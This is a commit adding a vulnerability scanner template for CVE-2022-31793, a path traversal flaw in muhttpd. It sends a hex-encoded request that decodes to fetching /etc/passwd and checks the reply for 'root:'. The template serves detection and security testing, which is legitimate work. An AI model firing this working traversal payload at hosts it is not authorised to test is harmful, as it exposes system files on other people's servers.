Merge pull request #4958 from scent2d/CVE-2022-31793

Create CVE-2022-31793.yaml
2022-08-04 20:37:15 +05:30 · 2022-08-04 20:37:15 +05:30 · d489fa1759
parent b7f81f5dc0 44ccfbf7b2
commit d489fa1759
1 changed files with 32 additions and 0 deletions
--- a/cves/2022/CVE-2022-31793.yaml
+++ b/cves/2022/CVE-2022-31793.yaml
@ -0,0 +1,32 @@
+id: CVE-2022-31793
+
+info:
+  name: muhttpd <= 1.1.5 - Path traversal
+  author: scent2d
+  severity: high
+  description: |
+    A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
+  reference:
+    - https://derekabdine.com/blog/2022-arris-advisory.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31793
+  metadata:
+    verified: true
+  tags: cve,cve2022,network,muhttpd,lfi,unauth
+
+network:
+  - host:
+      - "{{Hostname}}"
+
+    inputs:
+      - data: "47455420612F6574632F706173737764"
+        type: hex
+      - data: "\n\n"
+
+    read-size: 128
+    matchers:
+      - type: word
+        part: body
+        encoding: hex
+        words:
+          - "726f6f743a"